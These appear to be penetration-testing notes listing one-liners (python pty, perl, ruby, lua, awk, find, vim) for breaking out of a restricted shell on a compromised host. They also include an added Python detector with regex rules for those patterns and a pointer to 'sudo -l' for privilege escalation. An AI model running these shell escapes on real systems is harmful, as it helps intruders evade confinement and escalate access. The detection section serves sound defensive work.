
Shell Harnesses

Spawning Interactive Shells

When landing on a system with a limited or jailed shell, there are several alternative ways to spawn an interactive shell.

Methods

python

If Python is present:

python -c 'import pty; pty.spawn("/bin/sh")'

/bin/sh

Execute shell in interactive mode:

/bin/sh -i

Perl

If Perl is present:

perl -e 'exec "/bin/sh";'

Ruby

If Ruby is present:

ruby -e 'exec "/bin/sh"'

Lua

If Lua is present:

lua -e 'os.execute("/bin/sh")'

AWK

AWK is commonly available on Unix/Linux systems:

awk 'BEGIN {system("/bin/sh")}'

Find

Using the find command:

# Using find with awk
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

# Direct execution
find . -exec /bin/sh \; -quit

VIM

From within VIM:

vim -c ':!/bin/sh'

Or escape to a shell from within a running VIM session:

:set shell=/bin/sh
:shell
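
The same command shapes are what a defender wants to recognise in process telemetry. The following Python is an added detection example, not part of the original notes: it matches process command lines against one rule per method listed above and runs them over constructed sample events (the event fields, pids and rule names are assumptions).

```python
"""Flag process command lines that match the interpreter-to-shell patterns
listed above. Editor-added detection example; the events below are
constructed, not telemetry captured from a real host."""
import re
from typing import Optional

SHELL = r"(?:/usr)?/bin/(?:ba|da|z|k)?sh\b"

# One rule per method above, matched against the full command line as an
# auditd EXECVE record or EDR process-creation event would report it.
RULES = [
    ("python-pty",     re.compile(r"\bpython\S*\s+-c\s+.*pty\.spawn\(")),
    ("perl-exec",      re.compile(r"\bperl\s+-e\s+.*\bexec\b.*" + SHELL)),
    ("ruby-exec",      re.compile(r"\bruby\s+-e\s+.*\bexec\b.*" + SHELL)),
    ("lua-exec",       re.compile(r"\blua\S*\s+-e\s+.*os\.execute\(.*" + SHELL)),
    ("find-exec",      re.compile(r"\bfind\s+.*-exec\s+\S*(?:awk|" + SHELL + ")")),
    ("awk-system",     re.compile(r"\bawk\s+.*system\(\s*[\"']" + SHELL)),
    ("vim-shell",      re.compile(r"\bvim?\s+-c\s+[\"']?:(?:!|set\s+shell=)")),
    ("sh-interactive", re.compile(r"^" + SHELL + r"\s+-i\b")),  # noisy on its own
]


def classify(cmdline: str) -> Optional[str]:
    """Return the first matching rule name, or None if nothing matches."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def scan(events):
    """Return (pid, ppid, rule) for every process event that matches a rule."""
    hits = []
    for event in events:
        rule = classify(event["cmdline"])
        if rule is not None:
            hits.append((event["pid"], event["ppid"], rule))
    return hits


# Constructed process-creation events: pid, parent pid, command line.
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 4100, "cmdline": "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'"},
    {"pid": 4102, "ppid": 4100, "cmdline": "perl -e 'exec \"/bin/sh\";'"},
    {"pid": 4103, "ppid": 4100, "cmdline": "ruby -e 'exec \"/bin/sh\"'"},
    {"pid": 4104, "ppid": 4100, "cmdline": "awk 'BEGIN {system(\"/bin/sh\")}'"},
    {"pid": 4105, "ppid": 4100, "cmdline": "find . -exec /bin/sh \\; -quit"},
    {"pid": 4106, "ppid": 4100, "cmdline": "vim -c ':!/bin/sh'"},
    {"pid": 4107, "ppid": 4100, "cmdline": "python3 manage.py runserver"},                     # benign
    {"pid": 4108, "ppid": 4100, "cmdline": "find /var/log -name '*.gz' -exec gzip -t {} \\;"},  # benign
]

if __name__ == "__main__":
    for pid, ppid, rule in scan(SAMPLE_EVENTS):
        print(f"pid={pid} ppid={ppid} rule={rule}")
```

In practice the parent process matters more than the command line alone: an interpreter or `find` spawning a shell under a web server or service account is far more suspicious than the same command under an interactive login session.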

Execution Permissions Considerations

  • Check file permissions:

    ls -la <path/to/fileorbinary>

  • Check sudo permissions (requires a stable interactive shell):

    sudo -l

Understanding permissions helps identify potential privilege escalation vectors.